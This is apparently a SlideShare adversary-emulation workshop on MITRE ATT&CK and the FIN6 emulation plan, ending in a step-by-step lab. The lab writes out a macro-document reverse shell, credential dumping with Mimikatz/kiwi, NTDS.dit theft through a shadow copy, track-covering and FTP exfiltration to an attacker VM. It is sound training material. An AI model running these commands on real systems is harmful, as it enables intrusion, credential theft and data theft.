SlideShare a Scribd company logo

Adversary Emulation Workshop

P
prithaaash

The document discusses adversary emulation as a proactive cybersecurity assessment method, using the MITRE ATT&CK framework to evaluate organizations' defenses against real-world cyber threats. It addresses common cybersecurity challenges and emphasizes the need for collaborative approaches between red and blue teams to enhance security measures. By emulating tactics, techniques, and procedures (TTPs) of real adversaries, organizations can improve their security postures and readiness against potential attacks.

Technology
1 of 121
Downloaded 25 times
1
2
Most read
3
4
5
6
7
8
9
10
11
12
13
Most read
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Most read
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
Adversary Emulation using MITRE ATT&CK Sachin Deodhar CISSP, CPSA, GCFA, GDAT
Introducing Adversary Emulation Objectives: - Identify common cybersecurity assessment problems - Introduce adversary emulation concepts and methodology to address cyber threats proactively - Introduce MITRE ATT&CK as a framework to guide Adversary Emulation exercises - Describe a case study of on how to emulate APT Group attacks
Lets ponder over some philosophical questions: Genesis of the Adversary Emulation discipline
Common Assessment Problems Enterprises often want to understand their cybersecurity effectiveness. Common questions which arise are: - Are the enterprise employees trained and alert? - Are the internal processes to manage incidents effective? - Are enterprise technologies properly configured and delivering value?
Common Assessment Problems (contd.) Some of the common assessment techniques used in the industry are: - Threat Hunting - Red Teaming - Penetration Testing - Vulnerability Assessment These techniques focus primarily on initial access vectors without diving much into the world of Post Exploitation TTPs. They are important initiatives but are not representative of real-world threats!
Common Assessment Problems (contd.) Another significant problem observed with Red Team Exercises and Penetration tests is that often, Red and Blue teams are disincentivized from working together! It’s a Competition! They are reluctant to share their TTPs and the failure of one is often considered the success of the other! While Purple Teaming is way to get these conflicting forces to work together, this may not always be effective
Enter Adversary Emulation Execute real-world adversary TTPs to assess and improve cybersecurity! MITRE ATT&CK: A Common Ontology (we will return to this later)
How does Adversary Emulation help? - Adversary emulation (not simulation) helps organizations assess cybersecurity effectiveness against real-world threats, thereby enabling impactful improvements - Adversary emulation supports transparent disclosure of TTPs and findings - There's no need to withhold information because the TTPs are already in use in the wild - Because it's real-world, there is a greater sense of urgency to fix issues - Leverages MITRE ATT&CK to communicate adversary behaviors in a common language
MITRE ATT&CK • MITRE ATT&CK is an adversary TTP emulation framework to describe APT attack vectors aka Tactics, Techniques and Procedures (TTPs) • Tactics: Key adversary goal (e.g. Initial Access) • Techniques: A technique to achieve the desired goal (e.g. Spear Phishing) • Sub-technique: A specific example of a Technique (Spear Phishing → Spear Phishing via File Attachment • Procedure: A tool or script designed to operationalize a specific (Sub) Technique (e.g. Phishing Framework)
MITRE ATT&CK Usage • Identify and understand APT attack TTPs • Training tool for CTI analysts, defenders and red team operators • Attack campaign planning tool for Red Team Operations (Consultants and Enterprise) • Granular analysis of attacker TTPs across multiple APT actors/groups Examples coming up!
ATT&CK Enterprise Matrix Can't see much can you? ☺
MITRE ATT&CK Navigator Tooling the Matrix – RED Pill or BLUE • Sorry had to bring in a reference to my favorite movie! • Let's switch to something “Live”
ATT&CK Enterprise Matrix
Creating a New Campaign Layer
Researching APT Threat Actors/Groups
Researching Adversary TTPs
Mapping APT group TTPs on ATT&CK Graph
Planning a Red Team Op with MITRE ATT&CK Let's use Sandworm as an example Who or what is Sandworm
Sandworm APT Mapping
Adv. Example: Overlap Analysis with MITRE ATT&CK (APT29 || Sandworm)
Sandworm APT Mapping
APT29 Mapping
Overlap Analysis (Sandworm + APT29)
Adversary Emulation Overview Lets get back on track!
Adversary Emulation Overview Objectives: - Explain the purpose of Adversary Emulation - Describe Adversary Emulation characteristics - List common Adversary Emulation use cases
What is Adversary Emulation? • There is no standard definition to codify the discipline: • Sometimes, it is referred to as Threat Emulation • Sometimes, it is referred to as Simulation instead of Emulation There’s no standard definition for adversary simulation, yet. It doesn’t even have an agreed upon term. I’ve heard thread emulation, purple teaming, and attack simulation to discuss roughly the same concept. I feel like several of us are wearing blindfolds, feeling around our immediate vicinity, and we’re working to describe an elephant to each other. - Raphael Mudge(Cobalt Strike)
Example Definitions [Adversary Emulation] is a type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective like those of realistic adversary. - Jorge Orchilles, Scythe Adversary Emulation and Red Team Exercises (Educause) Emulating an adversary group means duplicating their behavior with precision and exactness…Simulating an adversary group means becoming a composite of behaviors (TTPs) from one or more adversary groups, potentially with new behaviors (TTPs) not previously used by that adversary group. - Tim MalcomVetter, Cyderes Emulation, Simulation, & False Flags Adversary emulation is an impersonation, mimicking of someone or something else. Based on threat intelligence, you determine APT28 is most likely to target your organization. To emulate this adversary, you mimic the TTPs they use and test those in your environment. You behave exactly like they would. - Jonas Bauters, NVISO Labs What’s in a name? Thoughts on Red Team nomenclature
How would I define it? • Emulation or Simulation? • The terms threat/adversary emulation/simulation are frequently used interchangeably • Some people impart precise meaning to the terms • Personal preference is to use Adversary Emulation Adversary Emulation is an intelligence driven discipline that entails researching, modeling, and executing cyber adversary tactics, techniques, and procedures (TTPs) to assess and improve cybersecurity.
Key Characteristics - Based on real-world threats - Behavior Focused Pyramid of Pain
Key Characteristics (contd.) - Transparent - Collaborative - Repeatable Secondary Characteristics These characteristics support professional and impactful engagements
Adversary Emulation Use Cases • Assessment and Improvement • Exercise personnel • Assess organizational processes • Evaluate technology • Capability Development • Create/modify tools and analytics based on adversary TTPs • Professional Development • Improve knowledge of ATT&CK and adversary behaviors
Adversary Emulation Framework Objectives: - Explain the purpose of Adversary Emulation Framework - Understand how the Adversary Emulation Framework works
Adversary Emulation Framework • Iterative process to guide adversary emulation activities • Aligned with the organization's cybersecurity goals • CTI driven • Methodical • Not a rigid process • It is common to revisit previous steps
Dissecting the steps
Define The Objective • Work with the network owners to help define their adversary emulation objectives • What cybersecurity problem is being addressed and why?
Research Adversary TTPs • Research CTI to inform which TTs you will emulate • What cyber adversaries are of salient interest to the organization? • What are their TTPs? • ATT&CK is used extensively • Common language for describing adversary TTPs • Summarized adversary descriptions • CTI sources
Plan The Activity • Professional Adversary Emulation requires planning • Scope • Schedule • Rules of Engagement • Written Approval • Communications Plan
Implement TTPs • Implement TTPs into a usable format • Striving for realism • Balancing project constraints • Consolidate TTPs into the Adversary Emulation Plan • Collection of resources used to execute adversary TTs
Conduct the Activity • Execute the Adversary Emulation Plan • Execute Each TTP • Was it detected/prevented? • Communicate and document activities and findings
Conclude the Activity • Concluding the activity typically entails: • Providing reports, presentations • Providing recommendations, mitigations • Supporting improvements • Lessons learned
Defining Engagement Objectives Objectives: - Explain why defining engagement objectives is necessary - Discuss the purpose of engagement objectives - Ask questions to help network owners define engagement objectives
Defining Engagement Objectives • Many questions are raised when we begin planning adversary emulation activities: • What adversary will we emulate? • What TTPs will we implement? • How will we execute these TTPs? • These answers should be driven by the engagement objectives • Ensures our adversary emulation activities are aligned with the organization's security goals.
Defining Engagement Objectives (contd.) • Engagement objectives define our goal: • "What are we trying to achieve with adversary emulation, and why?“ • Common examples from network owners: • We would like to emulate APT 29 TTPs to exercise our SOC staff • We would like to emulate adversary TTPs to evaluate our ED solution • We would like to emulate adversary TTPs because... ??? • Network owners commonly need guidance to define good adversary emulation engagement objectives
Questions to ask Network Owners • Ask questions to help network owners articulate their goals and priorities: • Why are you seeking an adversary emulation engagement? • What cyber threats are you concerned about? • What ATT&CK TTPs can you detect? • Be cognizant of the organization's goals and security maturity • Adversary emulation may not be appropriate for all use cases • They may not be ready for adversary emulation if they don't have foundational security practices in place
Introducing the Adversary Emulation Plan Objectives: - Explain the purpose of the adversary emulation plan - List components that make up an adversary emulation plan - Gain familiarity with the Center for Threat Informed Defense (CTID)Adversary Emulation Library.
Adversary Emulation Plan Overview What is an Adversary Emulation Plan? - Collection of resources that enables operators to emulate adversary TTPs - Provides step-by-step execution instructions - Incudes supporting resources (binaries, scripts, diagrams, ATT&CK navigator layers, etc.)
Adversary Emulation Plan Components • Adversary emulation plan components commonly include: • Adversary overview - objectives, targets, and tools • CTI - intelligence summary and sources • Diagrams - ATT&CK Navigator layers, operations flow diagrams • Written Procedures - setup and execution instructions • Resources - tools, binaries, scripts needed for execution • Mitigations - observables, artifacts, signatures, rules, etc
Adversary Overview Describe adversary’s objectives, targets, and tools
Cyber Threat Intelligence Include CTI sources used to generate emulation plans
Diagrams Operations flow and ATT&CK navigation Layers provide helpful visualizations APT 29 Diagrams
Written Procedures Setup and Execution Instructions
Resources All tools, binaries, scripts, and other resources needed to execute the emulation plan
Mitigations Rules and signatures to aid TTP prevention, detection, and response
CTID Adversary Emulation Library • A free library containing Adversary Emulation Plans https://github.com/center-for-threat-informed-defense/adversary_emulation_library
Touring the CTID Adversary Emulation Library # Lab 1
Step 1: Access the library • Your first task is to access the CTID Adversary Emulation Library. • Open a web browser and navigate to the library using the following URL: https://github.com/center-for-threat-informed-defense/adversary_emulation_library
Step 2: Explore the project README • We’ll now develop an understanding of the CTID Adversary Emulation Library project’s philosophy and general structure. Click the project README file and take a few minutes to read through its contents. (Note: README is a simple text file in markdown format. README files are commonly used to provide basic documentation about a project, such as its purpose, installation and usage instructions, license information, etc.)
Step 2: Explore the project README (contd.) • The project README lists several adversary emulation plans available for your use. Are any of these threat actors relevant to your organization?
Step 3: Understand the FIN6 Emulation Plan Components • We’re going to explore the FIN6 adversary emulation plan so you can study its components and content. The purpose of this exercise is to prime your understanding as we will execute the FIN6 emulation plan in an upcoming lab. Navigate to the FIN6 emulation plan directory and you should be greeted with the following:
Step 3: Understand the FIN6 Emulation Plan Components (contd.) • Take a moment to read through the FIN6 README. Note that the README provides a link to a video that demonstrates the CTID Emulation Library in action by its original authors; this video is highly recommended to supplement your learning. Also observe the emulation plan components, which can be seen in the FIN6 table of contents (see image below)
Step 4: Explore the FIN6 Intelligence Summary • The CTID Adversary Emulation Library provides cyber threat intelligence summaries for each of its emulation plans. The intelligence summaries describe the emulated actor’s objectives, targets, and observed TTPs based on publicly available reporting. Navigate to the FIN6 intelligence summary from the FIN6 table of contents (see image below).
Step 4: Explore the FIN6 Intelligence Summary (contd.) • After clicking the link, you should be on a page that resembles the following screenshot. • Read through FIN6 intelligence summary; try to understand FIN6’s objectives, target industries, and general TTPs.
Step 5: Explore the FIN6 Operations Flow • The Operations Flow page describes how the emulated actor works towards achieving their objectives. The operations flow helps visualize how to logically chain together major steps the emulated actor commonly performs during an operation. Navigate to the FIN6 Operations Flow from the FIN6 table of contents (see image below).
Step 5: Explore the FIN6 Operations Flow (contd.) • After clicking the link to the Operations Flow, you should see a page resembling the following screenshot.
Step 6: Explore the FIN6 Adversary Emulation Scenarios • Now that you are familiar with the FIN6 intelligence summary and operations flow, we are going to explore the FIN6 adversary emulation scenarios. The adversary emulation scenarios provide step-by-step instructions for executing the emulated actor’s TTPs, and also provide guidance on how to setup any required tools and/or infrastructure. Let’s look at these scenarios in detail. Navigate to the FIN6 Emulation Plan folder from the root of the FIN6 folder by clicking the “Emulation Plan” directory in the GitHub file browser (see image below).
Step 6: Explore the FIN6 Adversary Emulation Scenarios (contd.) • From the FIN6 Emulation Plan Folder, you should see a page that resembles the following screenshot.
Step 6: Explore the FIN6 Adversary Emulation Scenarios (contd.) • Start by reviewing the contents of Infrastructure.md • This document provides guidance on tools and infrastructure needed to complete the adversary emulation scenario. • Next, skim through the Phase1.md file • Do you see any TTPs you haven’t seen before? • Review the machine-readable YAML file, FIN6.yaml • This file is designed to be ingested by an automated adversary emulation framework such as CALDERA. In a future module, we will demonstrate how to execute adversary emulation scenarios automatically.
Setting Up Your Own Lab Environment # Lab 2
Requirements • Internet Access • Elevated privileges to install hypervisor software, such as VirtualBox • This lab requires sufficient resources to run Kali Linux and Windows Server 2019 virtual machines concurrently. The following minimum hardware specifications are recommended: • 8 GB RAM • 75 GB free disk space • 4 core 2 GHz CPU
MALWARE WARNING! Fundamentally, this lab entails executing publicly known adversary TTPs so that we can assess and improve cybersecurity. As a result, many of the tools and resources will likely be flagged malicious by security products. As a precaution, you should not perform these labs on any system that contains sensitive data. Additionally, you should never use capabilities and/or techniques taught in this course without first obtaining explicit written permission from the system/network owner(s).
Step 1: Download and Install a Hypervisor • A hypervisor is software that can create and run Virtual Machines. Virtual machines enable you to run guest operating systems on your host computer. We will use a hypervisor in order to run virtual machines running Kali Linux and Windows Server 2019 • Download and install the hypervisor of your choice; This talk will utilize VirtualBox, as it is freely available and supported on most operating systems (Windows, Mac, and Linux)
Step 1: Download and Install a Hypervisor(contd) • Install the necessary version according to your platform. • As a bonus, also download the extension pack.
Step 1: Download and Install a Hypervisor(contd) • Follow the onscreen steps to install VirtualBox
Step 2: Install Kali Linux and Windows Server • Go To https://www.kali.org/get-kali/#kali-virtual-machines • Choose the appropriate image according to your hypervisor and download it (in our case, it is VirtualBox) • Double click on the image and hit OK to install Kali Linux • Go To https://www.microsoft.com/en-us/evalcenter/evaluate- windows-server-2019 • Download the Windows Server 2019 ISO • Install the ISO in your hypervisor
[ Optional ] Steps • Install the extension packs • Install Guest Additions • Take a snapshot of the machine states
Step 3: Configuring the VMs • Go to https://github.com/maddev-engenuity/AdversaryEmulation • Download/Clone the repository on each of the Virtual Machines • Navigate to the directory containing the repository head $ cd vm_setup_scripts/kali $ sudo ./setup-kali-vm.sh • On Windows, open an Administrative Powershell session and run the following commands: • On Kali, type the following command: cd .vm_setup_scriptswindows_server .setup-dc.ps1
Step 3: Configuring the VMs (contd.) • When the setup processes are complete, the following accounts would be created on the respective VMs: • On Kali, a user will be created with the following credentials: • Username: attacker • Password: ATT&CK • On Windows Server 2019, a new user would be created with the following account credentials: • Username: MADmadAdmin • Password: ATT&CK
Executing the FIN6 Emulation Plan # Lab 3
Step 1: Access the Emulation Plan • Our first task is to access the CTID FIN6 Adversary Emulation Plan. We will be executing Phase 1 of the emulation. Navigate to the library using the following URL: https://github.com/center-for-threat-informed- defense/adversary_emulation_library/blob/master/fin6/E mulation_Plan/Phase1.md
Step 1: Access the Emulation Plan (contd.) Examining this plan, we see that there are 4 steps: • Initial Access • Discovery • Privilege Escalation, and • Collection and Exfiltration However, Initial Access does not have specific procedures provided. We’ll fill in this blank with our own procedure based on Cyber Threat Intelligence (CTI).
Step 2: Create Initial Access Payload The CTID Emulation Plan begins with an adversary performing discovery techniques on the target system. For this to be possible, the adversary first needs to gain access to the target system. Looking at the ATT&CK page for FIN6, we see that they have used the Phishing: Spear Phishing Attachment technique (T1566.001) to gain initial access. We’ll perform that technique using Metasploit’s Office Word Macro exploit, which we create on the Kali attacker VM. First, in a terminal window, as the attacker user, navigate to the proper directory by typing: cd AdversaryEmulation/labs/lab_1.3
Step 2: Create Initial Access Payload (contd.) Then start msfconsole as sudo by typing: sudo msfconsole -q Select the Office Word Macro exploit using the following command: use exploit/multi/fileformat/office_word_macro
Step 2: Create Initial Access Payload (contd.) As seen in the screenshot, Metasploit automatically configures the exploit to use the staged Windows Meterpreter TCP reverse shell. This is the x86 version of Meterpreter. In order to dump credentials with Mimikatz later in this lab, we need to use the x64 version. To do so, run the following command: set payload windows/x64/meterpreter/reverse_tcp We now need to configure the payload and exploit appropriately so the Meterpreter shell can connect back to our machine. Let’s list the various options for the payload and exploit using: show options
Step 2: Create Initial Access Payload (contd.) We will use the default template provided with the exploit, so we don’t need to change the CUSTOMTEMPLATE or FILENAME Module options. We can also leave the EXITFUNC and LPORT Payload options alone. We don’t need to change LPORT either, but we will take note of it. We will need to change the LHOST option though so the Meterpreter shell knows which host to connect to. To do that, we first need to find our attackerVM host’s IP address. We can list it using the command: ip a
Step 2: Create Initial Access Payload (contd.) Replace [attacker VM_ip_address] with your attacker VM IP address in the command above. Listing the options again shows that the IP address was successfully set. set LHOST [attackerVM_ip_address] Note: Your IP address may be different from the one shown in the image above. With this knowledge, we can set the LHOST option with the following command. Make sure to replace the placeholder with your host’s IP address:
Step 2: Create Initial Access Payload (contd.) exploit With our options set, all we need to do to create the malicious Word document is to run the exploit with the command: Lastly, we’ll copy the document to our current lab_1.3 folder with the following command: cp /root/.msf4/local/msf.docm . The payload is now ready for delivery
Step 3: Set up Payload Handler use exploit/multi/handler With our payload ready, we need a handler to accept the connection back from our target. We use msfconsole to set up this handler as well. First, select the exploit handler module by typing: Now, we need to inform the handler of the payload we are waiting for, which was: windows/x64/meterpreter/reverse_tcp set payload windows/x64/meterpreter/reverse_tcp Looking at the options, we see that LHOST needs to be set along with EXITFUNC to match our original payload’s option. We don’t need to set LPORT because it matches the options we set for the Word document payload.
Step 3: Set up Payload Handler (contd.) As before, we set the LHOST option with the attackerVM's IP address: set payload windows/x64/meterpreter/reverse_tcp We also set the EXITFUNC option to be thread: set EXITFUNC thread
Step 3: Set up Payload Handler (contd.) Lastly, we start the handler with the command: run When the Meterpreter reverse shell connects back to the attackerVM, the handler will accept the connection and begin an interactive session with the target.
Step 4: Serve Payload The Phishing: Spearphishing Attachment technique (T1566.001) specifies that the malicious payload is sent as an attachment in an email. However, for sake of simplicity, we will be simply sending the file to the target via an HTTP download. cd /home/attacker/AdversaryEmulation/labs/labs1.3 First, we need to set up an HTTP server to serve the malicious Word document. Open a new terminal tab with Ctrl+Shift+t, and then navigate to the lab 1.3 directory by typing: Then, start a Python3 HTTP server on port 80 by typing: cd /home/attacker/AdversaryEmulation/labs/labs1.3
Step 5: Download and Execute Payload Switch to the Windows host (targetDC). Use the following credentials to log in: • username: MADmadAdmin • password: ATT&CK Open PowerShell, and paste or type the following PowerShell command to download the payload to the Desktop. Make sure to replace the IP address placeholder with the IP address of the attackerVM: Invoke-WebRequest -Uri http://[attackerVM_IP_address]/msf.docm -OutFile C:UsersmadAdminDesktopmsf.docm
Step 5: Download and Execute Payload(contd.) You can now close the PowerShell window, as the payload has been delivered to the target. Parts of this emulation plan require elevated access. Normally, Microsoft Word is run in a low privilege context, which means the reverse shell that the adversary receives also is in a low privilege context. The adversary would then need to elevate their privileges somehow, such as by using a UAC Bypass exploit. To simplify the process here, and not stray too far from the existing emulation plan, we’ll start Word in an elevated context, so that the reverse shell we receive is also in an elevated context to begin with. Click on the search box in the Windows taskbar and type in ‘Word’. Right-click on the Microsoft Word result, select ‘Run as Administrator’, and then click Yes on the resulting UAC prompt. This will start Word in an elevated context.
Step 5: Download and Execute Payload(contd.) Click through any spurious popups that are opened by Word. From here, open ‘msf.docm’ that we downloaded to the Desktop. Then, click on the Enable Macros prompt shown in the image below to allow the payload to execute.
Step 5: Download and Execute Payload(contd.) Switch back to the msfconsole terminal window on the attackerVM. You should see that the handler received a callback from the (Windows) targetDC, with a new meterpreter session created. Type: We see that we are the MADmadAdmin user. getuid Take note of the IP address the connection was received from – this is the (Windows) targetDC’s IP address. In this case, it is 192.168.57.104.
Step 6: Account Discovery: Domain Account Now that we have a Meterpreter session on the targetDC, we can begin following the techniques listed in the FIN6 Emulation Plan. Most of the techniques presented in the Emulation Plan are provided with a FIN6 procedure and an Alternative procedure. In an actual Emulation exercise, you would most likely only execute one procedure for the technique. However, as this is a learning exercise, we will perform both the FIN6 and Alternative procedures where possible. Most of the specific procedures presented from this point onwards are taken directly from the CTID FIN6 Emulation Plan with minimal variation, mostly in the form of differentiating output filenames between the FIN6 and Alternative procedures. Additional instruction to facilitate execution of those procedures is provided in this walkthrough as well. FIN6 starts with some discovery commands on the domain, using a 3rd party tool called AdFind. AdFind has been prepositioned on the targetDC for sake of simplicity. In testing, AdFind was found to not work well with the default Command Prompt shell available in Meterpreter. So, in this lab, we use a PowerShell session instead. The procedures are also modified accordingly to work in PowerShell. Let’s drop down into a PowerShell session by running the following commands: load powershell powershell_shell
Step 6: Account Discovery: Domain Account (contd.) The discovery procedures write the results of the discovery commands to files. To keep everything tidy, first navigate to the Public user’s home directory, which is where we’ll write the output files: cd C:UsersPublic The first discovery technique in the plan is Account Discovery: Domain Account (T1087.002). The primary procedure for this technique as provided in the emulation plan is: adfind.exe -f "objectcategory=person" > ad_users.txt After running the command, we can view the contents of the output file with the type command: type ad_users.txt
Step 6: Account Discovery: Domain Account (contd.)
Step 6: Account Discovery: Domain Account (contd.) The alternate procedure uses the net user utility. We modify the command from the FIN6 emulation plan by changing the name of the output file: net user /domain > ad_users_net.txt
Step 7: Remote System Discovery Following the discovery of the users on the domain, FIN6 performs Remote System Discovery (T1018) to identify computer objects on the domain. The FIN6 procedure is: adfind.exe -f "objectcategory=computer" > ad_computers.txt
Step 7: Remote System Discovery (contd.) The Alternative procedure is: net group "Domain Computers" /domain > ad_computers_net.txt
Step 8: Domain Trust Discovery First, FIN6 enumerates all Organizational Units in the current user’s domain: adfind.exe -f "objectcategory=organizationalUnit" > ad_ous.txt With information on domain users and computers obtained, FIN6 performs Domain Trust Discovery (T1482) using 2 separate procedures.
Step 8: Domain Trust Discovery (contd.) Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A > ad_ous_ps.txt Alternative procedure: Next, FIN6 performs a full forest search for trust objects using AdFind’s trustdmp feature. As there are no other domains within the Active Directory forest for this environment, this command will return no results, but we perform it anyway to complete the emulation: adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt
Step 8: Domain Trust Discovery (contd.) nltest /domain_trusts > ad_trustdmp_nltest.txt Alternative procedure:
Step 9: System Network Configuration Discovery FIN6 procedure: adfind.exe -subnets -f "objectcategory=subnet" > ad_subnets.txt FIN6 then performs System Network Configuration Discovery (T1016) to list subnets within the network. As the target network consists of just 1 host, there will not be much information returned from this procedure, but we still perform it as a learning activity.
Step 9: System Network Configuration Discovery (contd.) Get-ADReplicationSubnet -Filter * > ad_subnets_ps.txt Alternative procedure: Again, as there are no subnets in our test domain, there is no output from this command.
Step 10: Permission Groups Discovery: Domain Groups FIN6 procedure: adfind.exe -f "objectcategory=group" > ad_group.txt The last discovery technique that FIN6 performs in this emulation plan is Permission Groups Discovery: Domain Groups (T1069.002). FIN6 uses AdFind to list groups in the domain and writes the output to a file.
Step 10: Permission Groups Discovery: Domain Groups (contd.) Alternative procedure: net group /domain > ad_group_net.txt
Step 11: Access Token Manipulation Having completed their discovery objectives, FIN6 begins working towards gaining privilege escalation on the domain, beginning with Access Token Manipulation (T1134). The procedure in the emulation plan uses Meterpreter’s getsystem command, which can escalate privileges in several different ways. In this scenario, we specify the use of the named-pipe impersonation method. Further information can be found in the documentation for Meterpreter. To perform the FIN6 procedure, we first need to exit the PowerShell shell within our Meterpreter session, to bring us back to the meterpreter> prompt. Ctrl+C y FIN6 procedure: getsystem -t 1
Step 11: Access Token Manipulation Having completed their discovery objectives, FIN6 begins working towards gaining privilege escalation on the domain, beginning with Access Token Manipulation (T1134). The procedure in the emulation plan uses Meterpreter’s getsystem command, which can escalate privileges in several different ways. In this scenario, we specify the use of the named-pipe impersonation method. Further information can be found in the documentation for Meterpreter. To perform the FIN6 procedure, we first need to exit the PowerShell shell within our Meterpreter session, to bring us back to the meterpreter> prompt. Ctrl+C y FIN6 procedure: getsystem -t 1
Step 11: Access Token Manipulation (contd.) Running getuid again, we see that we are now the NT SYSTEMAUTHORITY user, which means we now have additional privileges on the targetDC. The alternative procedure uses the PowerSploit PowerShell module, which contains a PowerShell function called Get-System, to also elevate privileges using the same named-pipe impersonation method. However, executing it crashes the Meterpreter shell. As a result, we leave it out of this lab walkthrough
Step 12: OS Credential Dumping After gaining elevated access to a target system, FIN6 has been found to dump credentials. The FIN6 Emulation Plan lists three separate procedures through which FIN6 has been reported to dump credentials. The first procedure performs OS Credential Dumping: LSASS Memory (T1003.001) using Meterpreter’s Mimikatz module. Run the following commands from the meterpreter> prompt to load the Mimikatz module into the Meterpreter session and then retrieve wdigest credentials: load kiwi creds_all
Step 12: OS Credential Dumping (contd.) The second procedure performs OS Credential Dumping: NTDS (T1003.003) by using Metasploit’s psexec_ntdsgrab module to download copies of the NTDS.dit file and the System registry hive. NTDS.dit is a database file containing Active Directory data, including usernames and hashed passwords. The SYSTEM registry hive and SYSTEM configuration file contain information that can be used to crack the passwords stored in NTDS.dit. The Metasploit module can have issues in execution, especially as Windows changes over time. Instead, we’ll perform the attack manually, which also gives us the opportunity to better understand the attack. If you recall from the last step, we escalated our user context to the NT SYSTEMAUTHORITY user, which is the user account with the most permissive access on the system. However, parts of this procedure require that they be run as a regular user in an elevated context to properly work. We can get back to our elevated madAdmin user context by migrating to a process that is running in that particular context. Process migration is a fairly complicated process. Meterpreter makes this very simple and transparent to us though. We’ll migrate back to the Word process, as we launched it as an Administrator, using the following command: migrate -N WINWORD.EXE getuid
Step 12: OS Credential Dumping (contd.) The first thing we do is create a Volume Shadow Copy of the C: drive. A Volume Shadow Copy is a snapshot of a set of files, which can be accessed to copy files even when the originals are currently being used by Windows. We do this using the Volume Shadow Copy Service: shell We see that we are back to the MADmadAdmin user. From here, we can proceed with the credential access procedure. From the meterpreter> prompt, drop into a Command Prompt shell: vssadmin create shadow /for=C:
Step 12: OS Credential Dumping (contd.) We also copy the SYSTEM registry hive and SYSTEM configuration file to the same directory, again with the same prefix as before. As before, replace the placeholder with the Shadow Copy Name we noted. copy <shadow_copy_name>windowsntdsntds.dit C:UsersPublicad_ntds.dit Now, copy the NTDS.dit file from the Shadow Copy to the C:UsersPublic directory, with a prefix for easy identification. Make sure to replace the placeholder with the value we just noted. Take note of the Shadow Copy ID and Shadow Copy Name as we’ll need them for the next commands. reg SAVE HKLMSYSTEM C:UsersPublicad_SYS_reg copy <shadow_copy_name>windowssystem32configSYSTEM C:UsersPublicad_SYSTEM_cfg
Step 12: OS Credential Dumping (contd.) vssadmin delete shadows /shadow=<volume_shadow_id> /Quiet We’ll extract these files in a later step. For now, we’ll delete the Shadow Volume Copy we created to erase some of our tracks. Replace the placeholder value in the command below with the Volume Copy ID noted earlier.
Step 13: Archive Collected Data: Archive via Utility cd C:UsersPublic 7.exe a -mx3 ad.7z ad_* After completing their discovery and collection activities, FIN6 archives all their collected data using a renamed command-line version of 7-Zip in preparation for exfiltration (T1560.001).
Step 14: Exfiltration Over Web Service The last task in the CTID FIN6 Emulation Plan is to exfiltrate the collected data. At the time of creating this lab, the Emulation Plan called for the use of Plink.exe to perform the exfiltration; however, the plan did not clarify how to perform the file transfer. Instead of simply using the provided Alternative Procedure, we can use this as an exercise to examine existing Cyber Threat Intelligence to determine a procedure that allows for a more faithful emulation. The IBM X-Force Exchange report found here indicates that FIN6 has used FTP to exfiltrate data to their systems.
Step 14: Exfiltration Over Web Service (contd.) With this knowledge, we can proceed with exfiltration, but this time using FTP. The first thing we need to do is to set up an FTP server on the attackerVM host. Go back to the terminal tab that was used to run the Python3 HTTP Server. Terminate the server by typing: Ctrl + C We will now use a Python3 FTP module to run an FTP server on the attackerVM: sudo python3 -m pyftpdlib -w -p21 -d /home/attacker/AdversaryEmulation/labs/lab_1.3 -u ftpuser -P ftppass
Step 14: Exfiltration Over Web Service (contd.) echo open {attackerVM_ip_address}> ftp.txt echo ftpuser>> ftp.txt echo ftppass>> ftp.txt echo put ad.7z>> ftp.txt echo bye>> ftp.txt With the FTP server set up, we can go back to our Meterpreter tab to upload the archive file using FTP. One thing to note is that the Windows FTP client is interactive. Due to the nature of the Meterpreter reverse shell, we are not able to interact with an interactive prompt. Instead, we need to write all the FTP commands we wish to run to a file, and then run the FTP client in non- interactive mode by passing it the file we just wrote. To write the file from a non-interactive prompt, run the following commands, replacing the IP placeholder with the appropriate value:
Step 14: Exfiltration Over Web Service (contd.) ftp –s:ftp.txt Finally, we can run the FTP client by passing in our text file with commands: Let’s go back to the FTP terminal tab and terminate the server with Ctrl+C as we no longer need it. Listing the contents of our lab folder, we can see that the file we uploaded is now present on the attackerVM. That brings us to the end of the emulation plan and the lab. Congratulations, you’ve successfully performed an Adversary Emulation Exercise!
Thanks :D

More Related Content

PDF
Breach and attack simulation tools
Bangladesh Network Operators Group
 
PDF
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
PDF
Purple Team Exercise Framework Workshop #PTEF
Jorge Orchilles
 
PPTX
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Digit Oktavianto
 
PPTX
Leveraging MITRE ATT&CK - Speaking the Common Language
Erik Van Buggenhout
 
PPTX
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
PPTX
ATT&CKing with Threat Intelligence
Christopher Korban
 
PDF
The Rise of the Purple Team
Priyanka Aash
 
Breach and attack simulation tools
Bangladesh Network Operators Group
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
Purple Team Exercise Framework Workshop #PTEF
Jorge Orchilles
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Digit Oktavianto
 
Leveraging MITRE ATT&CK - Speaking the Common Language
Erik Van Buggenhout
 
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
ATT&CKing with Threat Intelligence
Christopher Korban
 
The Rise of the Purple Team
Priyanka Aash
 

What's hot (20)

PPTX
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
PDF
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE - ATT&CKcon
 
PDF
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
PDF
Introduction to red team operations
Sunny Neo
 
PDF
The ATT&CK Latin American APT Playbook
MITRE ATT&CK
 
PDF
Purple Team Exercises - GRIMMCon
Jorge Orchilles
 
PPTX
Purple Teaming with ATT&CK - x33fcon 2018
Christopher Korban
 
PDF
